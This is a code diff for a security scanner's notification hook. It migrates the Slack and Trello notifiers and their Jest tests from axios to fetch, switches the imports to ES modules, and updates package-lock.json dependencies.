b/hooks/notification/hook/Notifiers/SlackAppNotifier.test.ts @@ -2,16 +2,26 @@ // // SPDX-License-Identifier: Apache-2.0 -import { SlackAppNotifier } from "./SlackAppNotifier"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { NotifierType } from "../NotifierType"; -import { Scan } from "../model/Scan"; +import { SlackAppNotifier } from "./SlackAppNotifier.js"; +import { NotifierType } from "../NotifierType.js"; -jest.mock("axios"); +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; + +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -67,6 +77,15 @@ test("Should Send Message With Findings And Severities", async () => { }; const slackNotifier = new SlackAppNotifier(channel, scan, [], []); - slackNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await slackNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalledWith( + "https://slack.com/api/chat.postMessage", + expect.objectContaining({ + method: 'POST', + headers: expect.objectContaining({ + 'Content-Type': 'application/json', + 'Authorization': expect.any(String) + }) + }) + ); }); diff --git a/hooks/notification/hook/Notifiers/SlackAppNotifier.ts b/hooks/notification/hook/Notifiers/SlackAppNotifier.ts index 898ab3056d..4d97ae30af 100644 --- a/hooks/notification/hook/Notifiers/SlackAppNotifier.ts +++ b/hooks/notification/hook/Notifiers/SlackAppNotifier.ts @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractNotifier } from "./AbstractNotifier"; -import { Finding } from "../model/Finding"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractNotifier } from "./AbstractNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; interface SlackApiResponse { ok: boolean; @@ -50,21 +50,25 @@ export class SlackAppNotifier extends AbstractNotifier { `Sending notification to Slack Channel: ${this.slackChannel}`, ); - const { data: response } = await axios.post( + const response = await fetch( "https://slack.com/api/chat.postMessage", { - ...message, - channel: this.slackChannel, - }, - { + method: 'POST', headers: { - Authorization: `Bearer ${process.env["SLACK_APP_TOKEN"]}`, + 'Content-Type': 'application/json', + 'Authorization': `Bearer ${process.env["SLACK_APP_TOKEN"]}`, }, - }, + body: JSON.stringify({ + ...message, + channel: this.slackChannel, + }), + } ); - if (!response.ok) { - throw new Error(`Slack API Call Failed: ${response.error}`); + const responseData = await response.json() as SlackApiResponse; + + if (!responseData.ok) { + throw new Error(`Slack API Call Failed: ${responseData.error}`); } } catch (e) { console.log( diff --git a/hooks/notification/hook/Notifiers/SlackNotifier.test.ts b/hooks/notification/hook/Notifiers/SlackNotifier.test.ts index 389755a965..50b88aa097 100644 --- a/hooks/notification/hook/Notifiers/SlackNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/SlackNotifier.test.ts @@ -3,15 +3,24 @@ // SPDX-License-Identifier: Apache-2.0 import { SlackNotifier } from "./SlackNotifier"; -import axios from "axios"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const channel: NotificationChannel = { @@ -65,8 +74,8 @@ test("Should Send Message With Findings And Severities", async () => { }; const slackNotifier = new SlackNotifier(channel, scan, [], []); - slackNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await slackNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -99,6 +108,6 @@ test("Should Send Minimal Template For Empty Findings", async () => { }; const n = new SlackNotifier(channel, scan, [], []); - n.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await n.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/SlackNotifier.ts b/hooks/notification/hook/Notifiers/SlackNotifier.ts index 719a83940d..9e72adc90f 100644 --- a/hooks/notification/hook/Notifiers/SlackNotifier.ts +++ b/hooks/notification/hook/Notifiers/SlackNotifier.ts @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { NotifierType } from "../NotifierType.js"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class SlackNotifier extends AbstractWebHookNotifier { protected type: NotifierType = NotifierType.SLACK; diff --git a/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts b/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts index b7fa5e6d2f..d0af5fa622 100644 --- a/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts +++ b/hooks/notification/hook/Notifiers/TrelloNotifier.test.ts @@ -3,16 +3,25 @@ // SPDX-License-Identifier: Apache-2.0 import { TrelloNotifier } from "./TrelloNotifier"; -import axios from "axios"; import { Finding } from "../model/Finding"; import { NotificationChannel } from "../model/NotificationChannel"; import { NotifierType } from "../NotifierType"; import { Scan } from "../model/Scan"; -jest.mock("axios"); +const originalFetch = global.fetch; beforeEach(() => { - jest.clearAllMocks(); + global.fetch = jest.fn().mockImplementation(() => + Promise.resolve({ + ok: true, + status: 200, + json: () => Promise.resolve({ ok: true }) + }) + ); +}); + +afterEach(() => { + global.fetch = originalFetch; }); const finding: Finding = { @@ -79,8 +88,8 @@ test("Should Create Cards With Findings And Severities", async () => { findings.push(finding); const trelloNotifier = new TrelloNotifier(channel, scan, findings, []); - trelloNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await trelloNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); test("Should Send Minimal Template For Empty Findings", async () => { @@ -116,6 +125,6 @@ test("Should Send Minimal Template For Empty Findings", async () => { findings.push(finding); const trelloNotifier = new TrelloNotifier(channel, scan, findings, []); - trelloNotifier.sendMessage(); - expect(axios.post).toHaveBeenCalled(); + await trelloNotifier.sendMessage(); + expect(global.fetch).toHaveBeenCalled(); }); diff --git a/hooks/notification/hook/Notifiers/TrelloNotifier.ts b/hooks/notification/hook/Notifiers/TrelloNotifier.ts index 5df06c930b..364c7538d2 100644 --- a/hooks/notification/hook/Notifiers/TrelloNotifier.ts +++ b/hooks/notification/hook/Notifiers/TrelloNotifier.ts @@ -2,13 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import { NotifierType } from "../NotifierType"; -import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier"; -import { Finding } from "../model/Finding"; -import { matches } from "../hook"; -import axios from "axios"; -import { NotificationChannel } from "../model/NotificationChannel"; -import { Scan } from "../model/Scan"; +import { AbstractWebHookNotifier } from "./AbstractWebHookNotifier.js"; +import { NotifierType } from "../NotifierType.js"; + +import type { Finding } from "../model/Finding"; +import type { NotificationChannel } from "../model/NotificationChannel"; +import type { Scan } from "../model/Scan"; export class TrelloNotifier extends AbstractWebHookNotifier { public static readonly TRELLO_CARDS_ENDPOINT = "TRELLO_CARDS_ENDPOINT"; @@ -63,7 +62,17 @@ export class TrelloNotifier extends AbstractWebHookNotifier { protected async sendJSONPostRequest(jsonData) { try { - await axios.post(this.resolveEndPoint(), jsonData); + const response = await fetch(this.resolveEndPoint(), { + method: 'POST', + headers: { + 'Content-Type': 'application/json', + }, + body: JSON.stringify(jsonData), + }); + + if (!response.ok) { + throw new Error(`HTTP error! Status: ${response.status}`); + } } catch (e) { console.log( `There was an Error sending the Message for the "${this.type}": "${this.channel.name}"`, @@ -73,21 +82,21 @@ export class TrelloNotifier extends AbstractWebHookNotifier { } private getTrelloKey(): string { - return process.env[TrelloNotifier.TRELLO_KEY]; + return process.env[TrelloNotifier.TRELLO_KEY] ?? ''; } private getTrelloToken(): string { - return process.env[TrelloNotifier.TRELLO_TOKEN]; + return process.env[TrelloNotifier.TRELLO_TOKEN] ?? ''; } private getTrelloList(): string { - return process.env[TrelloNotifier.TRELLO_LIST]; + return process.env[TrelloNotifier.TRELLO_LIST] ?? ''; } // If labels env not defined return empty string private getTrelloLabels(): string { if (TrelloNotifier.TRELLO_LABELS in process.env) { - return process.env[TrelloNotifier.TRELLO_LABELS]; + return process.env[TrelloNotifier.TRELLO_LABELS] ?? ''; } return ""; } @@ -95,7 +104,7 @@ export class TrelloNotifier extends AbstractWebHookNotifier { // If card pos env not defined return top private getTrelloPos(): string { if (TrelloNotifier.TRELLO_POS in process.env) { - return process.env[TrelloNotifier.TRELLO_POS]; + return process.env[TrelloNotifier.TRELLO_POS] ?? ''; } return "top"; } @@ -103,7 +112,7 @@ export class TrelloNotifier extends AbstractWebHookNotifier { // Any user defined prefix to add to the card title private getTrelloTitlePrefix(): string { if (TrelloNotifier.TRELLO_TITLE_PREFIX in process.env) { - return process.env[TrelloNotifier.TRELLO_TITLE_PREFIX]; + return process.env[TrelloNotifier.TRELLO_TITLE_PREFIX] ?? ''; } return ""; } diff --git a/hooks/notification/hook/hook.ts b/hooks/notification/hook/hook.ts index 67a4febf32..69ae29e3da 100644 --- a/hooks/notification/hook/hook.ts +++ b/hooks/notification/hook/hook.ts @@ -1,14 +1,15 @@ // SPDX-FileCopyrightText: the secureCodeBox authors // // SPDX-License-Identifier: Apache-2.0 -import { isMatch } from "lodash"; -import { Finding } from "./model/Finding"; -import { NotificationChannel } from "./model/NotificationChannel"; -import { Notifier } from "./Notifier"; -import { NotifierFactory } from "./NotifierFactory"; +import { isMatch } from "lodash-es"; import { readFileSync } from "fs"; import * as jsyaml from "js-yaml"; +import { NotificationChannel } from "./model/NotificationChannel.js"; +import { NotifierFactory } from "./NotifierFactory.js"; +import { Finding } from "./model/Finding.js"; +import { Notifier } from "./Notifier.js"; + const BASE_PATH = "/home/app/config"; const CHANNEL_FILE = `${BASE_PATH}/notification-channel.yaml`; diff --git a/hooks/notification/hook/model/Scan.ts b/hooks/notification/hook/model/Scan.ts index a5845b439e..5bcd6daf4c 100644 --- a/hooks/notification/hook/model/Scan.ts +++ b/hooks/notification/hook/model/Scan.ts @@ -2,10 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -import * as k8s from "@kubernetes/client-node"; +import type { V1EnvVar, V1ObjectMeta } from "@kubernetes/client-node"; export interface Scan { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ScanSpec; status: Status; } @@ -13,7 +13,7 @@ export interface Scan { export interface ScanSpec { scanType: string; parameters: Array; - env?: Array; + env?: Array; } export interface Status { diff --git a/hooks/notification/hook/package-lock.json b/hooks/notification/hook/package-lock.json index dbfea4cc72..dacbc845ce 100644 --- a/hooks/notification/hook/package-lock.json +++ b/hooks/notification/hook/package-lock.json @@ -9,8822 +9,3158 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.18.1", "@types/js-yaml": "^4.0.2", - "axios": "^1.6.0", "js-yaml": "^4.1.0", - "lodash": "^4.17.21", - "nodemailer": "^6.9.9", + "lodash-es": "^4.17.21", + "nodemailer": "^6.10.1", "nunjucks": "^3.2.4" }, "devDependencies": { - "@types/jest": "^29.4.0", - "@types/lodash": "^4.14.171", + "@kubernetes/client-node": "^1.3.0", + "@types/jest": "^30.0.0", + "@types/lodash-es": "^4.17.12", "@types/mustache": "^4.1.2", - "@types/node": "^16.0.0", + "@types/node": "^22.16.2", "@types/nodemailer": "^6.4.4", "@types/nunjucks": "^3.1.5", - "jest": "^29.3.1", - "ts-jest": "^29.0.5", - "typescript": "^4.3.5" + "esbuild": "^0.25.6", + "typescript": "^5.8.3" } }, "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.6.tgz", + "integrity": "sha512-ShbM/3XxwuxjFiuVBHA+d3j5dyac0aEVVq1oluIDf71hUw0aRF59dV/efUsIwFnR6m8JNM2FjZOzmaZ8yG61kw==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@esbuild/android-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.6.tgz", + "integrity": "sha512-S8ToEOVfg++AU/bHwdksHNnyLyVM+eMVAOf6yRKFitnwnbwwPNqKr3srzFRe7nzV69RQKb5DgchIX5pt3L53xg==", + "cpu": [ + "arm" + ], "dev": true, - "dependencies": { - "color-name": "1.1.3" + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@esbuild/android-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.6.tgz", + "integrity": "sha512-hd5zdUarsK6strW+3Wxi5qWws+rJhCCbMiC9QZyzoxfk5uHRIE8T287giQxzVpEvCwuJ9Qjg6bEjcRJcgfLqoA==", + "cpu": [ + "arm64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=0.8.0" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/@esbuild/android-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.6.tgz", + "integrity": "sha512-0Z7KpHSr3VBIO9A/1wcT3NTy7EB4oNC4upJ5ye3R7taCc2GUdeynSLArnon5G8scPwaU866d3H4BCrE5xLW25A==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.6.tgz", + "integrity": "sha512-FFCssz3XBavjxcFxKsGy2DYK5VSvJqa6y5HXljKzhRZ87LvEi13brPrf/wdyl/BbpbMKJNOr1Sd0jtW4Ge1pAA==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/compat-data": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.15.0.tgz", - "integrity": "sha512-0NqAC1IJE0S0+lL1SWFMxMkz1pKCNCjI4tr2Zx4LJSXxCLAdr6KyArnY+sno5m3yH9g737ygOyPABDsnXkpxiA==", + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.6.tgz", + "integrity": "sha512-GfXs5kry/TkGM2vKqK2oyiLFygJRqKVhawu3+DOCk7OxLy/6jYkWXhlHwOoTb0WqGnWGAS7sooxbZowy+pK9Yg==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/core": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.15.0.tgz", - "integrity": "sha512-tXtmTminrze5HEUPn/a0JtOzzfp0nk+UEXQ/tqIJo3WDGypl/2OFQEMll/zSFU8f/lfmfLXvTaORHF3cfXIQMw==", + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.6.tgz", + "integrity": "sha512-aoLF2c3OvDn2XDTRvn8hN6DRzVVpDlj2B/F66clWd/FHLiHaG3aVZjxQX2DYphA5y/evbdGvC6Us13tvyt4pWg==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": ">=18" } }, - "node_modules/@babel/core/node_modules/source-map": { - "version": "0.5.7", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", - "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.6.tgz", + "integrity": "sha512-2SkqTjTSo2dYi/jzFbU9Plt1vk0+nNg8YC8rOXXea+iA3hfNJWebKYPs3xnOUf9+ZWhKAaxnQNUf2X9LOpeiMQ==", + "cpu": [ + "x64" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], "engines": { - "node": ">=0.10.0" + "node": ">=18" } }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@esbuild/linux-arm": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.6.tgz", + "integrity": "sha512-SZHQlzvqv4Du5PrKE2faN0qlbsaW/3QQfUUc6yO2EjFcA83xnwm91UbEEVx4ApZ9Z5oG8Bxz4qPE+HFwtVcfyw==", + "cpu": [ + "arm" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.15.0.tgz", - "integrity": "sha512-h+/9t0ncd4jfZ8wsdAsoIxSa61qhBYlycXiHWqJaQBCXAhDCMbPRSMTGnZIkkmt1u4ag+UQmuqcILwqKzZ4N2A==", + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.6.tgz", + "integrity": "sha512-b967hU0gqKd9Drsh/UuAm21Khpoh6mPBSgz8mKRq4P5mVK8bpA+hQzmm/ZwGVULSNBzKdZPQBRT3+WuVavcWsQ==", + "cpu": [ + "arm64" + ], "dev": true, - "dependencies": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "node": ">=18" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.6.tgz", + "integrity": "sha512-aHWdQ2AAltRkLPOsKdi3xv0mZ8fUGPdlKEjIEhxCPm5yKEThcUjHpWB1idN74lfXGnZ5SULQSgtr5Qos5B0bPw==", + "cpu": [ + "ia32" + ], "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.6.tgz", + "integrity": "sha512-VgKCsHdXRSQ7E1+QXGdRPlQ/e08bN6WMQb27/TMfV+vPjjTImuT9PmLXupRlC90S1JeNNW5lzkAEO/McKeJ2yg==", + "cpu": [ + "loong64" + ], "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.6.tgz", + "integrity": "sha512-WViNlpivRKT9/py3kCmkHnn44GkGXVdXfdc4drNmRl15zVQ2+D2uFwdlGh6IuK5AAnGTo2qPB1Djppj+t78rzw==", + "cpu": [ + "mips64el" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-member-expression-to-functions": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.15.0.tgz", - "integrity": "sha512-Jq8H8U2kYiafuj2xMTPQwkTBnEEdGKpT35lJEQsRRjnG0LW3neucsaMWLgKcwu3OHKNeYugfw+Z20BXBSEs2Lg==", + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.6.tgz", + "integrity": "sha512-wyYKZ9NTdmAMb5730I38lBqVu6cKl4ZfYXIs31Baf8aoOtB4xSGi3THmDYt4BTFHk7/EcVixkOV2uZfwU3Q2Jw==", + "cpu": [ + "ppc64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.15.0" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.14.5.tgz", - "integrity": "sha512-SwrNHu5QWS84XlHwGYPDtCxcA0hrSlL2yhWYLgeOc0w7ccOl2qv4s/nARI0aYZW+bSwAL5CukeXA47B/1NKcnQ==", + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.6.tgz", + "integrity": "sha512-KZh7bAGGcrinEj4qzilJ4hqTY3Dg2U82c8bv+e1xqNqZCrCyc+TL9AUEn5WGKDzm3CfC5RODE/qc96OcbIe33w==", + "cpu": [ + "riscv64" + ], "dev": true, - "dependencies": { - "@babel/types": "^7.14.5" - }, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], "engines": { - "node": ">=6.9.0" + "node": ">=18" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.15.0.tgz", - "integrity": "sha512-RkGiW5Rer7fpXv9m1B3iHIFDZdItnO2/BLfWVW/9q7+KqQSDY5kUfQEbzdXM1MVhJGcugKV7kRrNVzNxmk7NBg==", + "node_modules/@esbuild/linux-s390x": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.6.tgz", + "integrity": "sha512-9N1LsTwAuE9oj6lHMyyAM+ucxGiVnEqUdp4v7IaMmrwb06ZTEVCIs3oPPplVsnjPfyjmxwHxHMF8b6vzUVAUGw==", + "cpu": [ + "s390x" + ], "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.0", - "@babel/helper-simple-access": "^7.14.8", - "@babel/helper-split-export-declaration": "^7.14.5", - 